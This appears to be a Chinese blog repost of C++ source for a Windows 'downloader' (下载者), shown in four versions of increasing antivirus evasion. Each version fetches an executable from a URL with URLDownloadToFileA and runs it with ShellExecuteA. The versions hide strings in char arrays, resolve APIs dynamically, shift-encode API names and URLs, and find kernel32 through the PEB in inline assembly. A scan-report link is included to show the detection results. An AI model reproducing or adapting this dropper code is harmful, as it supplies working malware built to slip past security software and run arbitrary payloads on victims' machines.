window技术
来源:互联网 发布:数据恢复管家婆创业板 编辑:程序博客网 时间:2024/06/16 17:28
#include <iostream>#include <Windows.h>#include <string>using namespace std;#pragma comment(lib,"urlmon.lib")//window下载者源码免杀之初级免杀int main( int argc, char* argv[] ){char http_$$downmini_kugou_com$kugou7695_exe[]={'h','t','t','p',':','/','/','d','o','w','n','m','i','n','i','.','k','u','g','o','u','.','c','o','m','/','k','u','g','o','u','7','6','9','5','.','e','x','e','\0'};char c_$hehe_exe[]={'c',':','/','h','e','h','e','.','e','x','e','\0'};char open[]={'o','p','e','n','\0'};URLDownloadToFileA(0,http_$$downmini_kugou_com$kugou7695_exe,c_$hehe_exe,0,NULL);ShellExecuteA(NULL,open,c_$hehe_exe,"","",SW_SHOW);return 0;}#include <iostream>#include <Windows.h>#include <string>using namespace std;typedef UINT (WINAPI *URLDownloadToFileAT)(LPUNKNOWN,LPCSTR,LPCSTR,DWORD,LPBINDSTATUSCALLBACK); URLDownloadToFileAT pURLDownloadToFileA = (URLDownloadToFileAT)GetProcAddress(LoadLibraryA("Urlmon.dll"),"URLDownloadToFileA");typedef HINSTANCE (WINAPI *ShellExecuteAT)(__in_opt HWND hwnd, __in_opt LPCSTR lpOperation, __in LPCSTR lpFile, __in_opt LPCSTR lpParameters,__in_opt LPCSTR lpDirectory, __in INT nShowCmd);ShellExecuteAT pShellExecuteA = (ShellExecuteAT)GetProcAddress(LoadLibraryA("shell32.dll"),"ShellExecuteA");char *UNICODEconvertANSI(LPWSTR wText,int targetCodePage){//wchar_t wText[20] = {L"宽字符转换实例!OK!"};int dwNum = WideCharToMultiByte(targetCodePage,NULL,wText,-1,NULL,0,NULL,FALSE);char *psText;psText = new char[dwNum+1];memset(psText,0,dwNum);WideCharToMultiByte (targetCodePage,NULL,wText,-1,psText,dwNum+1,NULL,FALSE);return psText;}LPWSTR ANSIConvertUNCOIDE(char* aText,int sourceCodePage){int len=MultiByteToWideChar(sourceCodePage,NULL,aText,-1,NULL,0);wchar_t *psText=new wchar_t[len+1];memset(psText,0,len);MultiByteToWideChar(sourceCodePage,NULL,aText,-1,psText,len+1);//psText[len]='\0';return psText;}//window下载者源码免杀之中级免杀 int main( int argc, char* argv[] ){//char http_$$downmini_kugou_com$kugou7695_exe[]={'h','t','t','p',':','/','/','d','o','w','n','m','i','n','i','.','k','u','g','o','u','.','c','o','m','/','k','u','g','o','u','7','6','9','5','.','e','x','e','\0'};char http_$$dlsw_baidu_co[]={'h','t','t','p',':','/','/','d','l','s','w','.','b','a','i','d','u','.','c','o','m','/','s','w','-','s','e','a','r','c','h','-','s','p','/','s','o','f','t','/','3','7','/','1','1','0','6','3','/','7','z','_','V','9','.','3','8','.','0','.','0','_','s','e','t','u','p','.','1','4','2','1','6','5','4','5','8','1','.','e','x','e','\0'};char c_$hehe_exe[]={'c',':','/','h','e','h','e','.','e','x','e','\0'};char open[]={'o','p','e','n','\0'};pURLDownloadToFileA(0,http_$$dlsw_baidu_co,c_$hehe_exe,0,NULL);pShellExecuteA(NULL,open,c_$hehe_exe,"","",SW_SHOW);return 0;}#include <iostream>#include <Windows.h>#include <string>using namespace std;char kernel32_dll[]={'k','e','r','n','e','l','3','2','.','d','l','l','\0'};char bGetProcAddress[]={'G','e','t','P','r','o','c','A','d','d','r','e','s','s','\0'};typedef FARPROC (WINAPI *GetProcAddressT)(__in HMODULE hModule,__in LPCSTR lpProcName);GetProcAddressT pGetProcAddressT = (GetProcAddressT)GetProcAddress(LoadLibraryA(kernel32_dll),bGetProcAddress);char bLoadLibraryA[]={'L','o','a','d','L','i','b','r','a','r','y','A','\0'};typedef HMODULE (WINAPI *LoadLibraryAT)(__in LPCSTR lpLibFileName);LoadLibraryAT pLoadLibraryAT = (LoadLibraryAT)pGetProcAddressT(LoadLibraryA(kernel32_dll),bLoadLibraryA);char bURLDownloadToFileA[]={'U','R','L','D','o','w','n','l','o','a','d','T','o','F','i','l','e','A','\0'};char bUrlmon_dll[]={'U','r','l','m','o','n','.','d','l','l','\0'};typedef UINT (WINAPI *URLDownloadToFileAT)(LPUNKNOWN,LPCSTR,LPCSTR,DWORD,LPBINDSTATUSCALLBACK); URLDownloadToFileAT pURLDownloadToFileA = (URLDownloadToFileAT)pGetProcAddressT(pLoadLibraryAT(bUrlmon_dll),bURLDownloadToFileA);char bshell32_dll[]={'s','h','e','l','l','3','2','.','d','l','l','\0'};char bShellExecuteA[]={'S','h','e','l','l','E','x','e','c','u','t','e','A','\0'};typedef HINSTANCE (WINAPI *ShellExecuteAT)(__in_opt HWND hwnd, __in_opt LPCSTR lpOperation, __in LPCSTR lpFile, __in_opt LPCSTR lpParameters,__in_opt LPCSTR lpDirectory, __in INT nShowCmd);ShellExecuteAT pShellExecuteA = (ShellExecuteAT)pGetProcAddressT(pLoadLibraryAT(bshell32_dll),bShellExecuteA);/**char *UNICODEconvertANSI(LPWSTR wText,int targetCodePage){//wchar_t wText[20] = {L"宽字符转换实例!OK!"};int dwNum = WideCharToMultiByte(targetCodePage,NULL,wText,-1,NULL,0,NULL,FALSE);char *psText;psText = new char[dwNum+1];memset(psText,0,dwNum);WideCharToMultiByte (targetCodePage,NULL,wText,-1,psText,dwNum+1,NULL,FALSE);return psText;}LPWSTR ANSIConvertUNCOIDE(char* aText,int sourceCodePage){int len=MultiByteToWideChar(sourceCodePage,NULL,aText,-1,NULL,0);wchar_t *psText=new wchar_t[len+1];memset(psText,0,len);MultiByteToWideChar(sourceCodePage,NULL,aText,-1,psText,len+1);//psText[len]='\0';return psText;}*///window下载者源码免杀之高级动态免杀int main( int argc, char* argv[] ){//char http_$$downmini_kugou_com$kugou7695_exe[]={'h','t','t','p',':','/','/','d','o','w','n','m','i','n','i','.','k','u','g','o','u','.','c','o','m','/','k','u','g','o','u','7','6','9','5','.','e','x','e','\0'};char http_$$dlsw_baidu_co[]={'h','t','t','p',':','/','/','d','l','s','w','.','b','a','i','d','u','.','c','o','m','/','s','w','-','s','e','a','r','c','h','-','s','p','/','s','o','f','t','/','3','7','/','1','1','0','6','3','/','7','z','_','V','9','.','3','8','.','0','.','0','_','s','e','t','u','p','.','1','4','2','1','6','5','4','5','8','1','.','e','x','e','\0'};char c_$hehe_exe[]={'c',':','/','h','e','h','e','.','e','x','e','\0'};char open[]={'o','p','e','n','\0'};pURLDownloadToFileA(0,http_$$dlsw_baidu_co,c_$hehe_exe,0,NULL);pShellExecuteA(NULL,open,c_$hehe_exe,"","",SW_SHOW);return 0;}#include <iostream>#include <Windows.h>#include <string>using namespace std;//加密信息并输出,要指定长度,字串结尾'\0'也可以被加密。再次调用即解密。 void DenCodeLen(char* pStr,unsigned int len) { for(unsigned int i=0;i<len;i++) { char ch=pStr[i];char dd=ch-1; pStr[i]=dd;} } //查杀报告:http://r.virscan.org/report/2f869d7f04d3a73a692ad861dc5cd892//window下载者源码免杀之高高级动态免杀int main( int argc, char* argv[] ){char kernel32_dll[]={'l','f','s','o','f','m','4','3','/','e','m','m','\0'};//kernel32.dllDenCodeLen(kernel32_dll,strlen(kernel32_dll));char bGetProcAddress[]={'H','f','u','Q','s','p','d','B','e','e','s','f','t','t','\0'};DenCodeLen(bGetProcAddress,strlen(bGetProcAddress));typedef FARPROC (WINAPI *GetProcAddressT)(__in HMODULE hModule,__in LPCSTR lpProcName);GetProcAddressT pGetProcAddressT = (GetProcAddressT)GetProcAddress(LoadLibraryA(kernel32_dll),bGetProcAddress);char bLoadLibraryA[]={'M','p','b','e','M','j','c','s','b','s','z','B','\0'};DenCodeLen(bLoadLibraryA,strlen(bLoadLibraryA));typedef HMODULE (WINAPI *LoadLibraryAT)(__in LPCSTR lpLibFileName);LoadLibraryAT pLoadLibraryAT = (LoadLibraryAT)pGetProcAddressT(LoadLibraryA(kernel32_dll),bLoadLibraryA);char URLDownloadToFileA[]={'V','S','M','E','p','x','o','m','p','b','e','U','p','G','j','m','f','B','\0'};DenCodeLen(URLDownloadToFileA,strlen(URLDownloadToFileA));char Urlmon_dll[]={'V','s','m','n','p','o','/','e','m','m','\0'};DenCodeLen(Urlmon_dll,strlen(Urlmon_dll));typedef UINT (WINAPI *URLDownloadToFileAT)(LPUNKNOWN,LPCSTR,LPCSTR,DWORD,LPBINDSTATUSCALLBACK); URLDownloadToFileAT pURLDownloadToFileA = (URLDownloadToFileAT)pGetProcAddressT(pLoadLibraryAT(Urlmon_dll),URLDownloadToFileA);char shell32_dll[]={'t','i','f','m','m','4','3','/','e','m','m','\0'};DenCodeLen(shell32_dll,strlen(shell32_dll));char ShellExecuteA[]={'T','i','f','m','m','F','y','f','d','v','u','f','B','\0'};DenCodeLen(ShellExecuteA,strlen(ShellExecuteA));typedef HINSTANCE (WINAPI *ShellExecuteAT)(__in_opt HWND hwnd, __in_opt LPCSTR lpOperation, __in LPCSTR lpFile, __in_opt LPCSTR lpParameters,__in_opt LPCSTR lpDirectory, __in INT nShowCmd);ShellExecuteAT pShellExecuteA = (ShellExecuteAT)pGetProcAddressT(pLoadLibraryAT(shell32_dll),ShellExecuteA);//http://downmini.kugou.com/kugou7695.exechar http_$$downmini_kugo[]={'i','u','u','q',';','0','0','e','p','x','o','n','j','o','j','/','l','v','h','p','v','/','d','p','n','0','l','v','h','p','v','8','7',':','6','/','f','y','f','\0'};DenCodeLen(http_$$downmini_kugo,strlen(http_$$downmini_kugo));char c_$hehe_exe[]={'d',';','0','i','f','i','f','/','f','y','f','\0'};DenCodeLen(c_$hehe_exe,strlen(c_$hehe_exe));char open[]={'p','q','f','o','\0'};DenCodeLen(open,strlen(open));pURLDownloadToFileA(0,http_$$downmini_kugo,c_$hehe_exe,0,NULL);pShellExecuteA(NULL,open,c_$hehe_exe,"","",SW_SHOW);//char bShellExecuteA[]={'T','i','f','m','m','F','y','f','d','v','u','f','B','\0'};//DenCodeLen(bShellExecuteA,strlen(bShellExecuteA));//cout<<bShellExecuteA<<endl;return 0;}//http://bbs.pediy.com/showthread.php?t=122260&page=2//win7 xp 通用获取Kernel32Addr方法HMODULE GetKernel32Addr(){HMODULE dwKernel32Addr = 0;__asm{push ecxpush esipush edixor ecx,ecxmov esi,dword ptr fs:[ecx+0x30]mov esi,dword ptr ds:[esi+0x0C]mov esi,dword ptr ds:[esi+0x1C]next_module:mov eax,dword ptr ds:[esi+0x8]mov edi,dword ptr ds:[esi+0x20]mov esi,dword ptr ds:[esi]cmp word ptr ds:[edi+0x18],cxjnz short next_modulepop edipop esipop ecxmov dwKernel32Addr, eax}return dwKernel32Addr;} 0 0
- window技术
- [技术]Window.ShowModalDialog使用手册
- [技术]Window.ShowModalDialog使用手册
- window-贴图技术
- Window Hook 技术详解
- C#实现Window管道技术
- [原创]C#实现Window管道技术
- 利用Visual C#实现Window管道技术
- 运用Visual C#完成Window管道技术
- 运用Visual C#完成Window管道技术
- 利用Visual C#实现Window管道技术
- Window和linux远程调试技术
- window环境下JNI技术实践
- window系统新手入门强力资料||系统技术
- VFW(video for window)技术-- 监控
- Window 10将内置眼球追踪技术
- [技术]window.open的使用方法以及参数说明
- window中进程间如何通信vc++技术 (共享内存)
- grep命令学习总结
- 第8周-重载运算符-实现复数类中的运算符重载-类的友元函数
- Delphi IDE下载全地址
- 64位windows 7 下plsql developer配置
- OnNewIntent 的调用
- window技术
- 16M/512M混合字符串大小写转换最快有多快!-也谈大数据下的性能优化深入探究
- HDU2161 Primes
- Static的用法及特点
- HDU 3072 Intelligence System(tarjan+DAG上的最小生成树形图)
- 求数组中最长递增子序列的长度
- hdoj 1861 游船出租
- bnu 4289 Theta Puzzle[bfs, 打表]
- c和指针之读书笔记4
